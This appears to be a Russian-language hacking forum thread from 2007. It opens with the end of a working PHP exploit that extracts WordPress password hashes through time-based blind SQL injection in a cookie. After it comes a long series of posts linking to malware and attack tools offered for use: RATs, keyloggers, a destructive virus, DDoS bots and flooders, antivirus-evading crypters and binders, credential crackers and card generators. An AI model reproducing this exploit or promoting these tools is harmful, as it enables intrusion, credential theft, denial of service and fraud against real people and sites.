$curr = $min + $half;

$inj = sprintf($ipattern, $prefix, $id, ">$curr");
$post = sprintf($ppattern, $suffix, $inj, $suffix);

$bigger = test_condition($post);

if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}

echo "curr: $curr--$max--$min
";
}

return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
global $url, $norm_delay;
$bret = false;
$maxtry = 10;
$try = 1;

while(1)
{
$start = getmicrotime();
$buff = make_post($url, $p);
$end = getmicrotime();

if($buff === '-1')
{
break;
}
else
{
echo "test_condition() - try $try - invalid return value ...
";
$try ++;
if($try > $maxtry)
{
die("too many tries - exiting ...
");
}
else
{
echo "trying again - try $try ...
";
}
}
}

$diff = $end - $start;
$delay = intval($diff * 10);

if($delay > ($norm_delay * 2))
{
$bret = true;
}

return $bret;
}
///////////////////////////////////////////////////////////////////////
function get_normdelay($testcnt)
{
$fa = test_md5delay(1);
echo "$fa
";
$sa = test_md5delay($testcnt);
echo "$sa
";
$fb = test_md5delay(1);
echo "$fb
";
$sb = test_md5delay($testcnt);
echo "$sb
";
$fc = test_md5delay(1);
echo "$fc
";
$sc = test_md5delay($testcnt);
echo "$sc
";

$mean_nondelayed = intval(($fa + $fb + $fc) / 3);
echo "mean nondelayed - $mean_nondelayed dsecs
";
$mean_delayed = intval(($sa + $sb + $sc) / 3);
echo "mean delayed - $mean_delayed dsecs
";

return $mean_delayed;
}
///////////////////////////////////////////////////////////////////////
function test_md5delay($cnt)
{
global $url, $id, $prefix, $suffix;

// delay in deciseconds
$delay = -1;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = ' UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH(user_pass)>31,BENCHMARK(%d,MD5(1337)),3)/*';
$inj = sprintf($ipattern, $prefix, $id, $cnt);
$post = sprintf($ppattern, $suffix, $inj, $suffix);

$start = getmicrotime();
$buff = make_post($url, $post);
$end = getmicrotime();

if(intval($buff) !== -1)
{
die("test_md5delay($cnt) - invalid return value, exiting ...");
}

$diff = $end - $start;
$delay = intval($diff * 10);

return $delay;
}
///////////////////////////////////////////////////////////////////////
function getmicrotime()
{
list($usec, $sec) = explode(" ", microtime());
return ((float)$usec + (float)$sec);
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');

if(!empty($cookie))
{
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
}

if(!empty($referer))
{
curl_setopt ($ch, CURLOPT_REFERER, $referer);
}

if($headers === TRUE)
{
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
}
else
{
curl_setopt ($ch, CURLOPT_HEADER, FALSE);
}

$fc = curl_exec($ch);
curl_close($ch);

return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($buf)
{
global $outfile;

$buf .= "
";
$fh = fopen($outfile, 'ab');
fwrite($fh, $buf);
fclose($fh);

}
///////////////////////////////////////////////////////////////////////
?>

Автор: неузнаваемый 25.05.2007, 00:31

Illusion Ddos bot 1.1

В архиве: хелп, ридми, крякнутый билдер, некрякнутый билдер (во вложеном архиве), пустой сервер бота.



Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.


http://damagelab.org

Статья по настройке http://team-madalf.com/index.php?showtopic=42612&view=getnewpost
пасс
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.

Автор: Gener 28.05.2007, 19:13

Немного софта от KD-Team

- Java Bind Shell

A example that shells are also possible with java.

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.


- BannerGrabber

Little application to grab a banner from a port

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.


- Brute MySql

A little application to bruteforce MySql passwords. You need to put the jar from mysql.com in your JRE lib\ext directory or link it at runtime.

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.


- KernelMode Sniffer

Nothing fancy just a working example of the code in the latest rootkit.com book. You can use this framework to make nifty things to capture info.

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.


- MySQL Shell's

Example sourcecode to execute commands on MySQL or have reverse or bindhsell. You need the MySQL libs and header file to compile some of this code.

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.


- SniffDoor

Userland Backdoor classes. It sniffs,matches word,spawns reverse shell. Works on tcp,udp,icmp. Nothing fancy just some handy code.

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.


- Connect Back Shell

Simple connect back shell. just to show how it works nothing fancy.

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации.
Зарегистрироваться.

Автор: Creeping Death 29.05.2007, 13:58

Yahoo Fake
http://rs108.rapidshare.com/files/33901066/fakeyahoo.rar

SHA-1 Cracker
http://rapidshare.com/files/33552570/SHA-1_Cracker.rar

Hippi virus
Virii.exe Summary :
-Modifies registry so that the user can't run
any exe, bat, ini, inf, reg files anymore ..
-Disables ALL exe's on computer including regedit, cmd, ...
-Deletes restore settings
-Modifies files of LastKnownGood Configuration changes
SystemFolder & Windows folder so it will be much worse to
start with LastKnownGood configurations to repair virii
-Modifies usb mass storage drivers and usb driver to make sure
that the user can't backup his data, disables access to new
usb drivers
-Windows can't be reinstalled because it gives error
"rundll32.exe" can't be opened. HDD should be formatted first
to install windows.
-3KB, completely undetectable ...
Tested in WinXP Sp1 & Sp2
NE TESTAT

http://rapidshare.com/files/33923095/virii.exe.html

Автор: Creeping Death 29.05.2007, 17:48

RapidShare Pack
* Bypass 1 hour limit
* Cred!t C@rd Generator2007
* RS Grabber 1.4.8
* No 1 proxy
* Rapidown 5.9
* RS Money
* Rapidsharecom Hack
* RsGetPoints 233
* USDownloader 21.4
* Rapidshare Premium Account
Bonus:
* Megaupload Hack
* Megaupload Premium
* Lifetime Premium
* More....

http://rapidshare.com/files/34025578/RapidShare_Pack_2007_may.rar

Автор: Creeping Death 31.05.2007, 20:52

Google Hacker 1.2
Небольшая софтинка упростит нашу задачу. теперь не придется в n-ый раз за вечер, общаться с гуглем. она все сделает на вас=)
http://rapidshare.com/files/34419081/Google_Hacker_1.2.rar.html

SuperScan
is a powerful TCP port scanner, pinger and hostname resolver.
/*впринципе, ничего особенного*/

http://rapidshare.com/files/34425920/superscan.rar.html

yahooUltraCracker
Powered By ArvinHacker =))
http://rapidshare.com/files/34425613/yahooUltraCracker.rar.html

Craven's Spam a Forum
довольно-таки шустрый и удобный
http://rapidshare.com/files/34425480/UC.Forum_Spam.rar.html

Pure phpBB emali Extractor
http://rapidshare.com/files/34425252/phpBB-Hack-Pack-ver1_1_.0.rar.html

phpBBcracker
http://rapidshare.com/files/34425117/phpBBcracker.rar.html

phpbb attack
2.x
http://rapidshare.com/files/34424959/phpbb_attack.rar.html

Php Nuke Hacker v11.0
учим турецкий. проста до безобразия.
http://rapidshare.com/files/34424795/Php_Nuke_Hacker_v11.0.rar.html


DoS 5.0
http://rapidshare.com/files/34420631/DoS_5.0.rar.html

Astaroth
http://rapidshare.com/files/34420176/Astaroth.rar.html

E-mail_Cracker
http://rapidshare.com/files/34418977/E-mail_Cracker.rar.html


MSN Messenger Account Cracker v2.0
http://rapidshare.com/files/34418007/MSN_Messenger_Account_Cracker_v2.0.rar.html

Slh 3.0 RAT
Thx to santasdad
http://rapidshare.com/files/34407835/s3.rar

cgi scanner
http://rapidshare.com/files/34418669/cgis4.rar.html

Автор: Creeping Death 11.06.2007, 09:17

CryptX 1.0 Public

Date: 4/20/2007
Platforms: All Windows Platforms
Undetectable as of 4/20/2007.
-RAR Password-
cryptX
NOTE: For each crypted file, the crypted file will copy itself
to the index directory (Where you launched CryptX from, and will save it
as crypted.exe) You'll need to put that file into a new file location.
NOTE: When CryptX is unloaded, it'll cause an invalid window call, just
click Cancel or No, on debug, and everything is saucy.
::Disclaimer::
In no way am I responsible for any unethical/illegal useages of CryptX! Please use this CryptX was made for educational purposes only. Please use this at your own risk.
::How it works?::
CryptX adds false code by Denoted bits of data to the PE Header and Entry point, thus confusing anti-virus hueristics. on randmomized 33555.59 Data variation. (the more you crypt the binary, the more different the outcome will be)
Some notes: After you've crypted the binary you may find it useful to pack it with a PE Packer. I recommend MEW 11, as being the most reliable and effective for packing distributable binaries. Please use this at your own risk, as I am not responsible for any damage or data loss using CryptX.
Enjoy CryptX!
Undetectable Status
FUNCTIONALITY AND STABLIZATION AFTER
CRYPTED MAY VARY, AND DEPENDING ON EACH VARIANT MAYBE
DIFFERENT FROM ANOTHER. I CRYPTED ONE OF EACH OF THE FOLLOWING
TROJANS, THEREFOR I AM JUST MAKING A "LOGICAL" GUESS THAT IT WILL
MAKE THE OTHER VARIATIONS THE SAME.]
MoSucker - all variations.
SubSeven - all variations.
C.I.A - all variations.
Net Devil - all variations.
Optix Pro - all variations.
DoS 5.5 - all variations.
Assorted Virii, worms, et cetera
effectivelly made undetected by
CryptX 1.0
If you crypt MyDoom, or some other serious shit,
don't be dumb, and re-populate it. Thanks.


http://rapidshare.com/files/36417385/CryptX_1.0.rar

MicroJoiner v1.7

http://rapidshare.com/files/36418044/mj17.zip

Chimera
автор: Kuzya
При запуске chimera прописывает себя в реестре и открывает на 10000 порту фтп сервер.
Небольшая особенность здесь в том, что бродя по папкам заражённого компа
Вы всегда будете видеть дополнительные папки с именами имеющихся дисков - то есть
из любой директории любого диска Вы можете попасть в корень другого диска.
Трой написан на делфи 6. Весит 176кб. На момент публикации антивирусами не палится.
Единственная известная пока бага: если заражённый имеет несколько IP-адресов то
к фтп серверу можно подключится только через один IP из этих нескольких.


 Chimera.zip ( 164,32 килобайт ) : 195
 

Автор: Creeping Death 11.06.2007, 11:51

http://www60.megaupload.com/files/1deb8067d68605a465dfa87b0bbef862/ExploitSQL.rar

Автор: Creeping Death 12.06.2007, 00:21

DHC-Hacking-Toolz
1. Ddoz Toolz
2. SQL Injection
3. CC [ Credit Card ]
4. IRC Attacking
5. Google Hacker
6. RapidShare Hack


http://rapidshare.com/files/36519048/DHC-Hacking-Toolz__AIO_.rar


SubSeven 2.1 gold edition
http://rapidshare.com/files/36507346/s21gold.zip.html


prorat v2.0
http://rapidshare.com/files/36530704/ProRatv2.0.rar.html

Wireless Hack Toolz

Kismet-2005-08-R
NetStumbler-0.4.0
Wellenreiter-v1.9
WEPcrack 0.1.0
airsnort-0.2.7e
wepwedgie-0.1.0-alpha
Hotspotter-0.4
Advanced Bash-Scripting Guide
Bash Guide for Beginners
The Linux Network Administrator's Guide, Second Edition

http://rapidshare.com/files/36519722/AIO_Wireless_Hack_Toolz.rar

Автор: Creeping Death 12.06.2007, 12:53

nBinder 5.1

http://rapidshare.com/files/36648901/nbinder_setup.rar

Advanced Invisible Keylogger v1.8 + Crack

http://rapidshare.com/files/36650292/Advanced_Invisible_Keylogger_v1.8.rar

Автор: Creeping Death 13.06.2007, 13:27

PHP Injection Scanner

http://rs124.rapidshare.com/files/36771817/Php_Injection_Scanner-mr.jack.rar

Автор: Creeping Death 13.06.2007, 19:16

Undetector v.1.2

http://rapidshare.com/files/36984051/Undetector_1.2.rar

Автор: Creeping Death 13.06.2007, 20:05

ProxyFuzz

ProxyFuzz is a man-in-the-middle non-deterministic network fuzzer written in Python. ProxyFuzz randomly changes (fuzzes) contents on the network traffic. It supports TCP and UDP protocols and can also be configured to fuzz only one side of the communication. ProxyFuzz is protocol agnostic so it can randomly fuzz any network communication.

ProxyFuzz is a good tool for quickly testing network protocols and provide with basic proof of concepts. Using this tool you will be amazed by the poor quality of software and you will see clients and servers dying upon unexpected input, just be prepared to see the very weird behaviours.

Syntax of ProxyFuzz:


ProxyFuzz 0.1, Simple fuzzing proxy by Rodrigo Marcos

usage():

python proxyfuzz -l <localport> -r <remotehost> -p <remoteport> [options]

[options]

-w: Number of requests to send before start fuzzing

-c: Fuzz only client side (both otherwise)

-s: Fuzz only server side (both otherwise)

-u: UDP protocol (otherwise TCP is used)

-v: Verbose (outputs network traffic)

-h: Help page

http://theartoffuzzing.com/downloads/proxyfuzz/proxyfuzz.py
http://theartoffuzzing.com/downloads/proxyfuzz/proxyfuzz.zip

Wfuzz - The web bruteforcer

Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforce GET and POST parameters for checking different kind of injections (SQL, XSS, LDAP,etc), bruteforce Forms parameters (User/Password), Fuzzing,etc.

It's very flexible, here are some functionalities:

* -Recursion (When doing directory bruteforce)
* -Post data bruteforcing
* -Output to HTML (easy for just clicking the links and checking the page, even with postdata!!)
* -Colored output on all systems wink.gif
* -Hide results by return code, word numbers, line numbers, etc.
* -Url encoding
* -Cookies
* -Multithreading
* -Proxy support
* -All parameters bruteforcing (POST and GET)
* -Dictionaries tailored for known applications (Weblogic, Iplanet, Tomcat, Domino, Oracle 9i,
Vignette, Coldfusion and many more. (All dictionaries are from Darkraver's Dirb, www.open-labs.org)


http://www.edge-security.com/soft/wfuzz-11.zip
http://www.edge-security.com/soft/wfuzz-1.1.tar.gz

Автор: Creeping Death 13.06.2007, 20:10

AWexploder 1.3

AWexploder helps you to find virtual hosts for a given IP address and looks for a CMS in each virtual host. In this version it looks for OpenSourceCMS's. More cms's will be added in later verions.

http://www.edge-security.com/soft/AWexploder.tar

Автор: Creeping Death 16.06.2007, 10:16

Hackers Fantastic KIT

CrackersKit 2005
Golden eye 2005
HellLabs Proxy Checker v7.4.18
HostScan v1.6.5.531
Invisible Browsing v4.0
IPScanner v1.86
Ascii Factory 0.6
Cool Beans NFO Creator v2.0.1.3
Dizzy v1.10
Feuer's NFO File Maker v2.0
Ims NFO&DIZ Maker 1.87
Inserter v1.12
NFO Creator v3.5.2
NFO Maker 1.0
Patchs All In One 2005
SoftIce 4.05 -Win 2000-XP
IP Address Scanner
IP Calculator
IP Converter
Port Listener
Port Scanner April 2005
Ping
NetStat 2005
Cool Trace Route 2005
TCP/IP Configuration
Online - Offline Checker
Resolve Host & IP
Time Sync
Whois & MX Lookup
Connect0r
Connection Analysator and prtotector
Net Sender April 2005
E-mail seeker
Cool Net Pager
Active and Passive port scanner
Spoofer
Hack Trapper
HTTP flooder (DoS)
Mass Website Visiter
Advanced Port Scanner
Trojan Hunter Multi IP April 2005
Port Connecter Tool
Advanced Spoofer
Cool Advanced Anonymous E-mailer April 2005
Simple Anonymous E-mailer
Anonymous E-mailer with Attachment Support
Mass E-mailer
E-mail Bomber
E-mail Spoofer
Simple Port Scanner (fast)
Advanced Netstat Monitoring
X Pinger
Web Page Scanner
Cool Fast Port Scanner
Deep Port Scanner
Fastest Host Scanner (UDP)
Get Header
Open Port Scanner
Multi Port Scanner
HTTP scanner (Open port 80 subnet scanner)
Multi Ping for Cisco Routers
TCP Packet Sniffer
UDP flooder
Cool Resolve and Ping
Multi IP ping
File Dependency Sniffer
EXE-joiner
Encrypter
Advanced Encryption
File Difference Engine
File Comparasion
Mass File Renamer
Add Bytes to EXE
5Cool Cool Variable Encryption
59) Simple File Encryption
60) ASCII to Binary
Enigma
Password Unmasker
Credit Card Number Validate and generate
Create Local HTTP Server
eXtreme UDP Flooder
Web Server Scanner
Force Reboot
Cool Webpage Info Seeker
Bouncer
Advanced Packet Sniffer
IRC server creater
Connection Tester
Fake Mail Sender
Bandwidth Monitor
Remote Desktop Protocol Scanner
MX Query
Messenger Packet Sniffer
Cool API Spy
DHCP Restart
File Merger
E-mail Extractor (crawler / harvester bot)
Open FTP Scanner
Fast Patch
Predator's Extreme Loader Generator 0.3
Srlzer - Patch generator
Yoda's Process Patcher
Buddha Patch File Creator 2.2
CodeFusion
Cool Beans NFO Creator 2.0.1 build 3
Patch Creation Wizard v1.2
Patch On The Fly v0.75
Rlzer
RTD - WINpatch v1.0
Tola's Patching Engine


Analysis :
OllyDbg 1.10
W32Dasm 8.93 /w patch
PEiD 0.92

Rebuilding :
ImpRec 1.6
Revirgin 1.3
LordPE RoyalITS

Packers :
FSG 2.0
MEW 11 1.2 SE
UPX 1.25

Patchers :
dUP 1.11
CodeFusion 3.0
Universal Patcher Pro 2.0
aPatch 1.07 (*New)
PMaker 1.1.0.0 (*New)
Tola's Patch Engine 2.03b (*Nuevo)
ABEL Loader 2.31 (*Nuevo)


HEX Editor :
BView 5.6.2

Decompilers :
DeDe 3.50.04
Flasm

Unpackers :
Alot! ( ASProtect, ACProtect etc )

Others :

FileMon
RegMon
RSATool 2
d*mn HashCalc
Krugers ToolBox
EVACleaner 2.7 (*New)
Process Explorer (*New)
Resource Hacker (*New)
PUPE 2002 (*New)


http://forum.hack-elite.com/board/tools/part1.zip
http://forum.hack-elite.com/board/tools/part2.zip

Автор: Creeping Death 16.06.2007, 10:39

Naked Packer 1.0

http://rapidshare.com/files/37434760/nakedpack.rar

Автор: Creeping Death 16.06.2007, 14:37

UnDo Crypter

UnDo Crypter Public Version
* Currently Undetectable from all AntiVirus
* Stub size is 4.50kb packed with UPX
* has a small compression ratio for unpacked files
bifrost server example 28.3kb / 32.8kb crypted


source code and private versions are for sale (contact i.am.noble.com@gmail.com for details)

http://rapidshare.com/files/37486192/UnDo_Crypter.rar

SharK 2.1.2&2.1.3

sharK is an advanced remote administration tool written in VB6. With sharK you will be able to administrate every PC in the world (using Windows OS) remotely. Here are some facts:

* sharK uses RC4 to encrypt the traffic
* sharK is able to resume downloads and uploads when the server disconnects on the next connect
* Compressed Transfers
* Thumbnail Previews of Pictures
* Keylogger works with Keyboard hooking
* You have a real DOS-Shell instead of dos-output like in the most rats
* Interactive Process Blacklist
* Virtual-Machine detection
* Double-Compression in Screencap & Webcam-Capture

And much much more. SharK is designed for professional remote administration, so you don’t have colourfull buttons etc and can enjoy lot’s of rightclick-menus and hotkeys and stuff like histograms.
- - - - - - - - - - - - - - - - - - - - - - - -
in 2.1.3
+ = New Feature
* = Bugfix

[+] You can show additional informations like AV/FW/Webcam/Browser in the SIN Console
[+] Raring Folders possible
[+] Broadcast-Download Possible
[*] Client didn't show interval correctly when loading settings
[*] Client doesn't show up the versionnumber twice in systray
[+] Menuitems can be collapsed automaticially
[*] Put zlib.dll inside the archive so screencap works for all Razz
[*] Group-Functions had big bug



http://rapidshare.com/files/37492616/sharK_212.rar
http://rapidshare.com/files/38078471/sharK_2.1.3.rar

Автор: Creeping Death 18.06.2007, 10:56

Pack Hack


-MailerX = You can spam with email! (it contains an smtp server)
-PHP Attacker = is a program that allow you to run exploitz on a website.(php)
-PhpNuke = Is a program that allows you to make sql injection on phpnuke sites (IT WORKS IS AWESOME)
-PHP-Nuke_Hacker = is a program that allow you to run exploitz on any website finding exploits from www.milw0rm.com
-IFRAME_DDoS_v1[1].0= You can flood a website with multiple connections
-Reuploaded=is a webnuker for websites! (it works great)
-ICMP DoS=You can flood a website
-IP_Hider_v2[1].7_-xray-=Is a good one for hiding you ip..(i am using it)
-PP-checker=Paypal checker to hack paypal accounts
-BrutusAET2 Host by HybriD3_2= one of best bruteforces ever
-evilsmiley= an .exe file that an evil face with an evil smiley appears on your monitor and u cant do anything ( a funny one )
-CSF-(c-sploiter final)= i will let you to check this out alone tongue.gif
-AntiDote_v1[1].2_osCE=To make a trojan undetected!
-Nudge_Madness=basicly is an autoclicker
-msn-nudger=it spams your contacts with nudges
-YouTUBE_downloader_2.1.1=you can download the videos on youtube with this program
-MEssBlackFrezzerBeta=You can freeze someone's account on msn
-bugs.txt= a text file that contains different bugs like a site could have...
-sploof_v0.90.installer= a program to try a website's security....
-proxylist.txt = contains proxies
-proxies.txt= contains proxies
-ipsteales = is a shell that helps you to steal someone's ip

- - - - - -
ИМХО,3-, но может кому-нибудь пригодится;)


http://rapidshare.com/files/37798225/pack.rar

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как наберете 100 сообщений.

Автор: Creeping Death 18.06.2007, 16:09

Aw&Firewall Killer v1.0 Release


http://rs11.rapidshare.com/files/20314776/S.E.T_Aw-Firewall_Killer_v1.0.rar

Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как наберете 100 сообщений.

Автор: Creeping Death 19.06.2007, 12:26

Mirkov4 v1.1

Mirkov4, a remote administration tool over http. It currently features desktop interaction (ala VNC), naviguation through the computer drives, download/upload/removal of files, execution of commands and a display of current running processes.

проверено под Win2003 with NOD32.
коннект- через брауз http://ip_vitima:7887


http://www.hacker-soft.net/down.php?id=2437&url=1

DalKrypt 1.0
http://rapidshare.com/files/38077832/DalKrypt_1.0.rar

Slh 4.0

+new file transfer manager pause/resume your transfers hopefully more stable
~server updates new identication imediatly
~changed compression engine (smaller server)
-removed registry editor and plugins will add again soon (improving)
~server 90% re-write
+most data compressed between client and server compressed
+HKLM and HKCU startup methods re-added
+ability to change mutex name
+added option to direct connect - still very usefull
~improved transfers stabilty
~persistance option improved
~socket connections improved
~changed stupid two letter varibales
main window
~show extension version outdated extension version showed in red.
+added dockable windows for connections,transfers + windows
system information
+added %IDLETIME% varibale get time away from keyboard + mouse
file manager
+drag drop files to upload
+goto folder with links for most folders
screen cap
+speed improved Ura
+change image bitcount when using bitmap
webcam
+option to select webcam driver
keylogger
+online key logger
other lil things
+added option to auto upload extension
~bold group names optional
+added skin support - not yet implemented


http://rapidshare.com/files/38079500/Slh_4.0.rar

Автор: Creeping Death 21.06.2007, 20:38

The Punisher Trojan

Antivirus Version Update Result
AhnLab-V3 2007.6.20.1 06.20.2007 no virus found
AntiVir 7.4.0.34 06.20.2007 no virus found
Authentium 4.93.8 06.19.2007 no virus found
Avast 4.7.997.0 06.20.2007 no virus found
AVG 7.5.0.467 06.19.2007 no virus found
BitDefender 7.2 06.20.2007 Generic.Malware.SDbTk.997E24F1
CAT-QuickHeal 9.00 06.19.2007 no virus found
ClamAV devel-20070416 06.20.2007 no virus found
DrWeb 4.33 06.20.2007 WIN.SCRIPT.Virus
eSafe 7.0.15.0 06.19.2007 no virus found
eTrust-Vet 30.7.3727 06.19.2007 no virus found
Ewido 4.0 06.20.2007 no virus found
FileAdvisor 1 06.20.2007 no virus found
Fortinet 2.91.0.0 06.20.2007 no virus found
F-Prot 4.3.2.48 06.19.2007 no virus found
F-Secure 6.70.13030.0 06.20.2007 Backdoor.Win32.VB.gen
Ikarus T3.1.1.8 06.20.2007 no virus found
Kaspersky 4.0.2.24 06.20.2007 Backdoor.Win32.VB.gen
McAfee 5056 06.19.2007 VB-BackDoor.a.gen
Microsoft 1.2607 06.20.2007 no virus found
NOD32v2 2341 06.20.2007 probably unknown NewHeur_PE virus
Norman 5.80.02 06.20.2007 no virus found
Panda 9.0.0.4 06.20.2007 no virus found
Prevx1 V2 06.20.2007 no virus found
Sophos 4.18.0 06.12.2007 Mal/VB-F
Sunbelt 2.2.907.0 06.09.2007 no virus found
Symantec 10 06.20.2007 no virus found
TheHacker 6.1.6.136 06.20.2007 no virus found
VBA32 3.12.0.2 06.20.2007 no virus found
VirusBuster 4.3.23:9 06.19.2007 no virus found
Webwasher-Gateway 6.0.1 06.20.2007 no virus found

When the victim open server.exe this will close automatically windows firewall ,nod32 ,sygate firewall ,disable task manager

Server copy: C:\WINDOWS\system32\Svchost32.exe
Trojan Name: The Punisher Trojan
Server size:294 KB
Client Size:1,45 MB
Coded In : Visual Basic
Author:E.M.I.N.E.M


http://rapidshare.com/files/38467233/The_Punisher_Trojan.rar.html
http://www.g0t-filez.net/472263

Автор: Creeping Death 22.06.2007, 16:20

Some Hack Tools(pack)

-DoS Attacker

-Ftpbrut

-FTPBruter

-Ip Scaner

-Ip Nuker

-Xp killer

-EliteKeylogger v1.0

-LogIT v1.0

-LttLogger v2.0

-SCKeyLog v 2.24

-Bitfrost v 1.102

-ColdFusion v1.2

-ProRavt v1.9

-ToquitoBandito v 5h17

-ToxiBackDoor

-BlackCobra Downloader

-ToxiWebdl v1.1


http://rapidshare.com/files/38667356/Hack_tools.rar

Автор: Creeping Death 23.06.2007, 12:06

[AIO] PassWord Sniffer

MessenPass
Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.


Mail PassView
Recovers the passwords of the following email programs: Outlook Express, Mcft Outlook 2000 (POP3 and SMTP Accounts only), Mcft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.


Protected Storage PassView
Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more...


Dialupass
Password recovery tool that reveals all passwords stored in dial-up entries. (Internet and VPN connections) As opposed to many other tools, this tool works in all versions of Windows, including Windows 2000 and Windows XP.


Asterisk Logger
Recovers passwords stored behind asterisks (****) characters. You can use this tool to recover the passwords of many applications, like CuteFTP, CoffeeCup Free FTP, VNC, and more...


Network Password Recovery
Recover network passwords stored by Windows XP operating system.


SniffPass Password Sniffer
Capture the passwords that pass through your network adapter, and display them on the screen instantly.
You can use this utility to recover lost Web/FTP/Email passwords.


http://rapidshare.com/files/38772211/PWSniff.rar

Автор: Creeping Death 23.06.2007, 15:58

SBinder

http://rapidshare.com/files/38847479/SBinder.zip

Vulnerability Scanners Pack

+CGI Founder
+Cgi Scanner 4
+LanSpy
+Libwhisker 2.3
+Nikto
+NStealth HTTP Security Scanner 5.8 Free
+Retina - For Windows NT
+Shadow Security Scanner 7.84
+THC-Amap Version 5.2
+VoidEYE CGI Scanner
+Web Check


http://rapidshare.com/files/38849020/Vulnerabilty_Scanners.rar

Password Decrypters Pack

-Access Driver
-Brutus-AEt2
-Cain and Abel 4.2
-FileZilla PWDump 0.1
-ForceSQL
-John The Ripper 1.7.1 Win
-KMd5 1.03b
-LC3
-MailForce2.4
-MD5 (Linux)
-MD5 Backup (Linux)
-MD5 GUI
-MD5 Toolbox 1.0
-MD5brute 1.0
-Passware 5.0 + Serial
-POP3 BruteForcer
-Sam Decrypt
-Unsecurev1.2
-VNCrack (Linux) 1.21
-VNCrack (Win32) 1.21


http://rapidshare.com/files/38850477/Password_Decrypters.rar

Packers, Crypters and Protectors Pack

-AREA 51 Cryptor
-ASPack 2.12
-AZProtect
-Cexe (NT Only)
-Diet
-Enigma Protector 1.16
-exe32pack
-ExE Evil v1.0
-EXESmasher 1.0
-FSG v1.33.zip
-FSG v2.0
-ICrypt 1.0
-IProtect
-Krypton v0.3
-Lzexe1.00a
-Mew 11 SE v1.2
-MoleBox 2.6.1
-Morphine v1.9
-Mr. Undectetable
-NeoLite v2.0
-nPack 1.1.300
-NsPack v3.4 Full Cracked
-NT Packer
-Pack 1.0
-Packman 1.0
-PECompact v2.64 Full
-PEncrypt 4.0
-PEPack 1.0
-Petite 2.2
-Pex 0.99
-Phantom
-PKLite32 1.0
-Private EXE Protector 2.0
-RAT Packer
-RLPack 1.16 Basic Edition
-RLPack 1.17 Personal Edition
-Scramble Tool v0.2.2 rc1
-SDC 1.2
-shrnkEXE
-Stud v1.0 Crypter.
-tElock 0.98
-Underground Crypter 1.0
-UPX v2.02
-UPX Crypt
-Wind Of Crypt 1.0
-WinLite
-WWPACK 3.05
-Yoda's Crypter v1.3


http://rapidshare.com/files/38851879/Packers__Crypters_and_Protectors.rar

Nukers and Flooders Pack

-AdonAi v0.1 FTP DDoS
-AntiRUS 3.0
-Assault
-Battle Pong
-Click 2.2
-Death n Destruction DoS
-Denyo Launch Flooder
-DoS Attacker
-DoSTool
-Ether Flood
-Evil IGMP
-F-ed Up
-Fortune
-FreeSite Killer 2.01
-Hospitables Nuke 2.23
-Http Bomber v1.001b
-Hybrid Flood 2
-ICMP Flood
-IGMP
-Inferno
-IPT
-kod
-Nuke'em
-NuKe.zip
-PacketStorm 1.3
-Panther Mode2
-phpBBAttacker
-phpBB DoS
-Ping Attack
-RCP Nuke
-Rocket 1.0
-Site NuKe
-Sprut
-TheRapist
-UC Forum Spam
-Vai Tu J Nuker
-Voob
-VZM Nuker
-Web Attacker ENG
-Web X Grabber


http://rapidshare.com/files/38854169/Nukers_and_Flooders.rar

Binders Pack

-AFX Executable Binder PRO
-Amok Joiner
-Asylum Binder
-Binder
-BlackCore File Binder
-Blade Stoner 1.5
-BTS Binder
-Crucified 1.2
-Djoiner 1.3
-Deception v4.0
-Droopy Binder 1.0
-EES Binder 1.0
-exe,jpg,doc File Binder
-Exebinder v2.5
-F.B.I
-File Injector v3
-Fresh Bind
-Freshbind v2.01
-Frusion v1.0
-HelioS Binder v1.0c
-Hook Toolbox
-IDE Spinner
-Inbinder v1.0
-Interlaced II v1.00
-J-BiNdEr
-M3Byter
-MBinder
-Multi Binder 1.4.1
-MVM v1.0
-NakedBind v1.0
-Newjoin
-NG Binder Pro
-Nightwolf Binder 1.0 Alpha
-OverDoz 2
